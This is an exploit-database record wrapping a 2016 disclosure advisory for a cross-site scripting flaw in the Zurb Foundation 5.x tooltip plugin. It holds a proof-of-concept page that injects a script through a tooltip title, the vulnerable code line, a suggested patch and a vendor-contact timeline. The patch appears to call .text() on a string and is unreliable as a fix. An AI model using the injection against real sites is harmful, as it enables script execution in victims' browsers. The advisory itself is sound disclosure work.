Zurb Foundation versions 5.5.1 and 5.5.3 suffer from a cross site scripting vulnerability.
{"id": "1337DAY-ID-26438", "type": "zdt", "bulletinFamily": "exploit", "title": "Zurb Foundation 5.5.3 / 5.5.1 Cross Site Scripting Vulnerability", "description": "Zurb Foundation versions 5.5.1 and 5.5.3 suffer from a cross site scripting vulnerability.", "published": "2016-11-29T00:00:00", "modified": "2016-11-29T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/26438", "reporter": "Winni Neessen", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-03T15:14:08", "viewCount": 57, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "threatpost", "idList": ["THREATPOST:5D5241707AB76ED799696E37D048872A", "THREATPOST:7876640D5EC3E8FE3FE885606BBB1C6D"]}]}, "exploitation": null, "vulnersScore": -0.2}, "sourceHref": "https://0day.today/exploit/26438", "sourceData": "XSS vulnerabilty in the tooltip plugin of Zurb Foundation 5.x\r\n=============================================================\r\n\r\nURL to this advisory: https://nop.li/foundation5tooltipxss\r\n\r\nVendor\r\n======\r\nhttp://zurb.com/\r\n\r\nProduct\r\n=======\r\n(Taken from http://foundation.zurb.com/sites/docs/v/5.5.3/)\r\nFoundation is the most advanced, responsive front-end framework in the \r\nworld. The framework is mobile\r\nfriendly and ready for you to customize it any way you want to use it.\r\n\r\nVulnerability Type\r\n==================\r\nCross-Site-Scripting Vulnerability\r\n\r\nCVE Reference\r\n=============\r\nN/A\r\n\r\nVulnerability Details\r\n=====================\r\nThe Foundation framework provides an easy way to insert tooltips into \r\nyour code. The corresponding plugin\r\nfor this is *foundation.tooltip.js*. Unfortunately the plugin takes \r\nHTML-encoded code from the title\r\nparameter and returns it as actual HTML, allowing an attacker to inject \r\ndynamic HTML/JS into an\r\napplication, if the application allows to inject user input into title \r\nfields of a tooltip'ed SPAN\r\nentity. Even if the user input is correctly encoded, before adding it to \r\nthe tooltip'ed SPAN, the\r\nFoundation Tooltip JavaScript will re-decode it and inject the actul \r\nHTML code.\r\n\r\nExample code\r\n============\r\nThis code snippet shows a simple HTML page with encoded HTML in a \r\ntooltip, utilizing the Foundation\r\nJS plugin.\r\n\r\n<!DOCTYPE html>\r\n<html class=\"no-js\" lang=\"en\">\r\n <head>\r\n <meta charset=\"utf-8\">\r\n <meta content=\"width=device-width, initial-scale=1.0\" name=\"viewport\">\r\n <title>Foundation 5 Tooltip XSS example</title>\r\n <script src=\"/foundation/js/vendor/modernizr.js\"></script>\r\n <link href=\"/css/vpnauth.css\" rel=\"stylesheet\">\r\n <link href=\"/css/font-awesome.min.css\" rel=\"stylesheet\">\r\n </head>\r\n <body>\r\n <span data-tooltip data-options=\"hover_delay: 50;\" class=\"has-tip\" \r\ntitle=\"<script>alert(\"Oh crap! \r\nXSS'ed\");</script>\">This is a tooltip'ed SPAN</span>\r\n <!-- Begin Foundation JavaScript includes //-->\r\n <script src=\"/foundation/js/vendor/jquery.js\"></script>\r\n <script src=\"/foundation/js/foundation/foundation.js\"></script>\r\n <script \r\nsrc=\"/foundation/js/foundation/foundation.tooltip.js\"></script>\r\n <script>//<![CDATA[\r\n $(document).foundation();\r\n //]]></script> <!-- End Foundation JavaScript includes //-->\r\n </body>\r\n</html>\r\n\r\nWhen opened in a browser, the encoded HTML from the title-parameter in \r\nline 12 will be grabbed by the\r\ntooltip plugin and re-decoded to plain HTML in the output, causing the \r\nJavaScript to be injected into\r\nthe page. A JavaScript alert window will pop up.\r\n\r\nQuick fix/Workaround\r\n====================\r\nThe problem lies in line 197 of *foundation.tooltip.js*:\r\n\r\nvar $tip = $(tip_template(this.selector($target), \r\n$('<div></div>').html($target.attr('title')).html())),\r\n classes = this.inheritable_classes($target);\r\n\r\nThe title attribute is read and provided as HTML without any \r\nsanitization. As a quick fix, one could\r\nuse the .text() function of jQuery to sanitize the read value from the \r\ntitle attribute. This might\r\nnot be a full fix for the issue, but at least worked in my examples.\r\n\r\nHere is a diff for quick patching:\r\n\r\n--- ./foundation.tooltip.js.orig 2016-11-28 16:57:31.000000000 \r\n+0100\r\n+++ ./foundation.tooltip.js 2016-11-29 10:45:16.000000000 +0100\r\n@@ -196,3 +196,3 @@\r\n\r\n- var $tip = $(tip_template(this.selector($target), \r\n$('<div></div>').html($target.attr('title')).html())),\r\n+ var $tip = $(tip_template(this.selector($target), \r\n$('<div></div>').html($target.attr('title').text()).html())),\r\n classes = this.inheritable_classes($target);\r\n\r\nAffected versions\r\n=================\r\nSuccesfully tested in Zurb Foundation 5.5.1 and 5.5.3\r\n\r\nTimeline\r\n========\r\n- 2016-03-01: Opened issue with Zurb\r\n- 2016-03-03: Reply from a Foundation DEV and assignment to a different \r\ndeveloper to take care\r\n- 2016-04-20: Nothing happend, thus I asked for an update on the issue. \r\nNo reply.\r\n- 2016-06-08: Still nothing happend. Asked for an update again. No \r\nreply.\r\n- 2016-11-28: Still no reply, so I closed the ticket and announced the \r\ndisclosure\r\n- 2016-11-29: Release of this advisory\n\n# 0day.today [2018-01-03] #", "_state": {"dependencies": 1647589307, "score": 1659729680, "epss": 1678852985}}
Zurb Foundation 5.5.3 / 5.5.1 Cross Site Scripting Vulnerability